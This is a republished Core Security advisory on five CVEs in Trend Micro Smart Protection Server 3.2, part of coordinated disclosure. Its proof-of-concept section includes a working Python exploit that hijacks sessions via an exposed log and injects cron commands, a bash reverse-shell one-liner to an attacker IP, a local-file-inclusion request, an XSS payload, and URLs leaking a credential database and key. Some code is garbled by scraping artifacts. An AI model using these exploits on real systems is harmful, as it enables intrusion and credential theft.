首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Trend Micro Smart Protection Server 3.2 XSS / Access Control / Disclosure
来源:http://www.coresecurity.com 作者:CoreLabs 发布时间:2017-12-25  
1. *Advisory Information*

Title: Trend Micro Smart Protection Server Multiple Vulnerabilities
Advisory ID: CORE-2017-0008
Advisory URL:
http://www.coresecurity.com/advisories/trend-micro-smart-protection-server-multiple-vulnerabilities
Date published: 2017-12-19
Date of last update: 2017-12-11
Vendors contacted: Trend Micro
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Information Exposure Through Log Files [CWE-532], Improper
Neutralization of Special Elements used in an OS Command [CWE-78],
Improper Control of Filename for Include/Require Statement in PHP
Program [CWE-98], Improper Neutralization of Input During Web Page
Generation [CWE-79],Improper Authorization [CWE-285]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-11398, CVE-2017-14094, CVE-2017-14095,
CVE-2017-14096,CVE-2017-14097

3. *Vulnerability Description*

Trend Micro's website states that:

Trend Micro Smart Protection Server [1] is a next-generation, in-the-cloud
based, advanced protection solution. At the core of this solution is an
advanced scanning architecture that leverages malware prevention
signatures that are stored in-the-cloud. This solution leverages file
reputation and Web reputation technology to detect security risks. The
technology works by off loading a large number of malware prevention
signatures and lists that were previously stored on endpoints to Trend
Micro Smart Protection Server.

Multiple vulnerabilities were found in the Smart Protection Server's
Administration UI that would allow a remote unauthenticated attacker to
execute arbitrary commands on the system.

4. *Vulnerable Packages*

   . Trend Micro Smart Protection Server 3.2 (Build 1085)
Other products and versions might be affected, but they were not tested.

5. *Vendor Information, Solutions and Workarounds*

Trend Micro published the following Notes:

   . SECURITY BULLETIN: Trend Micro Smart Protection Server (Standalone)
     Multiple Vulnerabilities[2]

6. *Credits*

These vulnerabilities were discovered and researched by Leandro Barragan
and Maximiliano Vidal from Core Security Consulting Services. The
publication of this advisory was coordinated by Alberto Solino from Core
Advisories Team.

7. *Technical Description / Proof of Concept Code*

In section 7.1 we describe how an unauthenticated attacker could get a
session token to perform authenticated requests against the application.

Sections 7.2 and 7.3 describe two vectors to achieve remote command
execution in the context of the Web application.

Several public privilege escalation vulnerabilities exist that are still
unpatched. In combination with the aforementioned vulnerabilities a
remote unauthenticated attacker would be able to execute arbitrary
system commands with root privileges.

Sections 7.4 and 7.5 cover other common Web application vulnerabilities
found in the product's console.

7.1. *Session hijacking via log file disclosure*

[CVE-2017-11398]
The application stores diagnostic logs in the
/widget/repository/log/diagnostic.log file. Performing a login or some
basic browsing will write several entries with the following format:

/-----
2017-08-18 17:00:38,468,INFO,rti940901j0556161dudhj6805,null,<br />
<b>Notice</b>: Undefined index: param in
<b>/var/www/AdminUI/widget/inc/class/common/db/GenericDao.php</b> on
line <b>218</b><br /><br />

-----/
Each log entry leaks the associated session ID next to the log alert
level and can be accessed via HTTP without authenticating to the Web
application.
Therefore, an unauthenticated attacker can grab this file and hijack
active user sessions to perform authenticated requests.

7.2. *Remote command execution via cron job injection*

[CVE-2017-14094]
The script admin_update_program.php is responsible for creating a cron
job when software updates are scheduled. The HTTP request contains
several parameters that are used without sanitization as part of the
cron job created at /var/spool/cron/webserv. We will target the
hidTimingMin parameter.

File /var/www/AdminUI/php/admin_update_program.php:

/-----
if (
___FCKpd___0
SERVER['REQUEST_METHOD'] == 'POST'){ [...] $arr_au['Program']['AUScheduleTimingMin']= isset(
___FCKpd___0
POST["hidTimingMin"])?
___FCKpd___0
POST["hidTimingMin"]:"0"; [...] if ( $arr_au['Program']['UseAUSchedule'] == "1"){ if ( $arr_au['Program']['AUScheduleType'] == "0" ){ $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", "*"); }else { $crontab->setDateParams($arr_au['Program']['AUScheduleTimingMin'], $arr_au['Program']['AUScheduleTimingHour'], "*", "*", $arr_au['Program']['AUScheduleTimingDay']); } $crontab->setCommand("/usr/tmcss/bin/UpdateManage.exe --Program --Schedule > /dev/null 2>&1"); $crontab->saveCronFile(); } if(! $crontab->addToCrontab()){ header( 'Location: admin_update_program.php?status=savecrontaberror&sid='.$session_name ) ; exit; } -----/ File /var/www/AdminUI/php/inc/crontab.php: /----- function setDateParams($min=NULL, $hour=NULL, $day=NULL, $month=NULL, $dayofweek=NULL){ if($min=="0") $this->minute=0; elseif($min) $this->minute=$min; else $this->minute="*"; if($hour=="0") $this->hour=0; elseif($hour) $this->hour=$hour; else $this->hour="*"; $this->month=($month) ? $month : "*"; $this->day=($day) ? $day : "*"; $this->dayofweek=($dayofweek != NULL) ? $dayofweek : "*"; } function saveCronFile(){ $command=$this->minute." ".$this->hour." ".$this->day." ".$this->month." ".$this->dayofweek." ".$this->command."\n"; if(!fwrite($this->handle, $command)) return true; else return false; } function addToCrontab(){ if(!$this->filename) exit('No name specified for cron file'); $data=array(); exec("crontab ".escapeshellarg($this->directory.$this->filename),$data,$ret); if($ret==0) return true; else return false; } -----/ The following python script creates a cron job that will run an arbitrary command on every minute. It also leverages the session hijacking vulnerability described in 7.1 to bypass the need of authentication. /----- #!/usr/bin/env python import requests import sys def exploit(host, port, command): session_id = get_session_id(host, port) print "[+] Obtained session id %s" % session_id execute_command(session_id, host, port, command) def get_session_id(host, port): url = "https://%s:%d/widget/repository/log/diagnostic.log" % (host, port) r = requests.get(url, verify=False) for line in r.text.split('\n')[::-1]: if "INFO" in line or "ERROR" in line: return line.split(',')[3] def execute_command(session_id, host, port, command): print "[+] Executing command '%s' on %s:%d" % (command, host, port) url = "https://%s:%d/php/admin_update_program.php?sid=%s" % (host, port, session_id) multipart_data = { "ComponentSchedule": "on", "ComponentScheduleOS": "on", "ComponentScheduleService": "on", "ComponentScheduleWidget": "on", "useAUSchedule": "on", "auschedule_setting": "1", "update_method": "1", "update_method3": "on", "userfile": "", "sid": session_id, "hidComponentScheduleOS": "1", "hidComponentScheduleService": "1", "hidComponentScheduleWidget": "1", "hidUseAUSchedule": "1", "hidScheduleType": "1", "hidTimingDay": "2", "hidTimingHour": "2", "hidTimingMin": "* * * * * %s #" % command, "hidUpdateOption": "1", "hidUpdateNowFlag": "" } r = requests.post(url, data=multipart_data, cookies={session_id: session_id}, verify=False) if "MSG_UPDATE_UPDATE_SCHEDULE" in r.text: print "[+] Cron job added, enjoy!" else: print "[-] Session has probably timed out, try again later!" if __name__ == "__main__": exploit(sys.argv[1], int(sys.argv[2]), sys.argv[3]) -----/ The following proof of concept opens a reverse shell to the attacker's machine. /----- $ python coso.py 192.168.45.186 4343 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' [+] Obtained session id q514un6ru6stcpf3k0n4putbd3 [+] Executing command 'bash -i >& /dev/tcp/192.168.45.80/8888 0>&1' on 192.168.45.186:4343 [+] Cron job added, enjoy! $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.45.186] port 8888 [tcp/*] accepted (family 2, sport 59508) bash: no job control in this shell [webserv@ localhost ~]$ -----/ 7.3. *Remote command execution via local file inclusion* [CVE-2017-14095] The /widget/inc/widget_package_manager.php script passes user provided input to the PHP require_once function without sanitization. However, there are some restrictions that need to be overcome in order to include arbitrary files, as the application appends PoolManager.php at the end of the filename. File /var/www/AdminUI/widget/inc/widget_package_manager.php: /----- switch($widgetRequest['act']){ case "check": try{ // $strUpdateType = widget, configure_widget_and_widget_component $strUpdateType = isset($widgetRequest['update_type']) ? $widgetRequest['update_type'] : 'widget'; $strFuncName = 'is'.WF::getTypeFactory()->getString()->getUpperCamelCase($strUpdateType).'Update'; $isUpdate = WF::getWidgetPoolFactory()->getWidgetPoolManager($strUpdateType)->$strFuncName(); [...] -----/ File /var/www/AdminUI/widget/inc/class/widgetPool/WidgetPoolFactory.abstract.php: /----- public function getWidgetPoolManager($strUpdateType = 'widget'){ if(! isset(self::$instance[__FUNCTION__][$strUpdateType])){ $strFileName = $this->objFramework->getTypeFactory()->getString()->getUpperCamelCase($strUpdateType); require_once (self::getDirnameFile() . '/widget/'.$strFileName.'PoolManager.php'); $strClassName = 'WF'.$strFileName.'PoolManager'; self::$instance[__FUNCTION__][$strUpdateType] = new $strClassName($this->objFramework); } return self::$instance[__FUNCTION__][$strUpdateType]; } -----/ One way for an attacker to place an arbitrary file on the system is to abuse the update process that can be managed from the same product console. Files downloaded from alternate update sources are stored in the /var/tmcss/activeupdate directory. An attacker can setup a fake update server and trigger an update from it to download the malicious archive. As an example, we have packed a reverse shell named rshellPoolManager.php into the bf1747402402.zip archive. The following server.ini would instruct the application to download the archive and uncompress it inside /var/tmcss/activeupdate: /----- ; ======================================= ; ActiveUpdate 1.2 US ; ; Filename: Server.ini ; ; New Format AU 1.8 ; ; Last modified by AUJP1 10/14/2015 ; ======================================= [Common] Version=1.2 CertExpireDate=Jul 28 08:52:40 2019 GMT [Server] AvailableServer=1 Server.1=http://<serverIP>:1080/ AltServer=http://<serverIP>:1080/ Https=http://<serverIP>:1080/ [PATTERN] P.48040039=pattern/bf1747402402.zip,1747402402,257 -----/ After triggering an update from the Web console, the PHP script is written to the expected location. /----- [root@ localhost activeupdate]# ls -lha /var/tmcss/activeupdate/ | grep php -rw-r--r--. 1 webserv webserv 66 ago 25 22:59 rshellPoolManager.php -----/ The final step is to include the script and execute our payload. /----- POST /widget/inc/widget_package_manager.php?sid=dj0efdmskngvt4lbhakgc6cru7 HTTP/1.1 Host: 192.168.45.186:4343 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: application/json Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Request: JSON X-CSRFToken: dj0efdmskngvt4lbhakgc6cru7 Content-Type: application/json; charset=utf-8 Content-Length: 122 Cookie: dj0efdmskngvt4lbhakgc6cru7=dj0efdmskngvt4lbhakgc6cru7 Connection: close {"act": "check", "update_type": "../../../../../../../../../var/tmcss/activeupdate/rshell"} -----/ Steven Seeley and Roberto Suggi Liverani presented various privilege escalation vectors to move from webserv to root on their presentation "I Got 99 Trends and a # Is All Of Them". Based on our testing the attacks remain unpatched, so we did not try to find additional ways to escalate privileges. 7.4. *Stored cross-site scripting* [CVE-2017-14096] The ru parameter of the wcs_bwlists_handler.php script is vulnerable to cross-site scripting. This endpoint is used to manage user defined URLs. After the rule is inserted, the payload will be executed every time the user opens the user defined URLs section. The following proof of concept stores code to open an alert box. /----- https://<serverIP>:4343/php/wcs_bwlists_handler.php?sid=2f03bf97fc4912ee&req=mgmt_insert&st=1&ac=0&ru=http%3A%2F%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E&rt=3&ipt=0&ip4=&ip4m=128&cn=&dn= -----/ 7.5. *Improper access control* [CVE-2017-14097] The product console includes widgets that can be used to monitor other servers. Credentials to access the servers being monitored, widget logs and other information reside on a SQLite database which can be accessed without authentication at the following URL: /----- https://<serverIP>:4343/widget/repository/db/sqlite/tmwf.db -----/ The credentials are stored using AES256 with a dynamic key. However, the key is also placed inside the Web server directories and available for download without authentication. /----- https://<serverIP>:4343/widget/repository/inc/class/common/crypt/crypt.key -----/ This would allow an attacker to decrypt the contents of the database, rendering the encryption mechanism useless. 8. *Report Timeline* . 2017-09-04: Core Security sent an initial notification to Trend Micro, including a draft advisory. . 2017-10-02: Core Security asked for an update on the vulnerability reported. . 2017-10-02: Trend Micro stated they are still in the process of creating the official fix for the vulnerabilities reported. ETA for the fix should be end of this month (October). . 2017-11-13: Core Security requested a status on the timeline for fixing the reported vulnerabilities since the original ETA was not accomplished. . 2017-11-14: Trend Micro stated they are still working on the Critical Patch and found problems along the way. Patch is now in QA. . 2017-11-20: Trend Micro informed availability for the fixes addressing 5 out of the 6 vulnerabilities reported. They stated one of the reported vulnerabilities is on a table where the SQL query is allowed and 'does not cause anything leaking'. Still in the process of localizing the critical patches for other regions. Will let us know when everything is covered in order to set a disclosure date. . 2017-11-21: Core Security thanked the update and agreed on removing one of the reported vulnerabilities. . 2017-12-05: Trend Micro provided the CVE-ID for all the vulnerabilities reported and proposed the public disclosure date to be December 14th. . 2017-12-06: Core Security thanked the update and proposed public disclosure date to be Tuesday December 19th @ 12pm EST. . 2017-12-19: Advisory CORE-2017-0008 published. 9. *References* [1] https://www.trendmicro.com/en_ca/business/technologies/smart-protection-network.html [2] https://success.trendmicro.com/solution/1118992 10. *About CoreLabs* CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security* Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity &amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. *Disclaimer* The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Xbox 360 Aurora 0.6b Default C
·Oracle MySQL UDF Payload Execu
·GetGo Download Manager 5.3.0.2
·Netcore / Netis Routers - UDP
·COMTREND ADSL Router CT-5367 -
·Fortinet FortiGate 4.x < 5.0.7
·Technicolor DPC3928SL - SNMP A
·Sendroid < 6.5.0 - SQL Injecti
·Cisco IOS 12.2 < 12.4 / 15.0 <
·Telesquare SKT LTE Router SDT-
·SysGauge Server 3.6.18 - Denia
·Ruby < 2.2.8 / < 2.3.5 / < 2.4
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved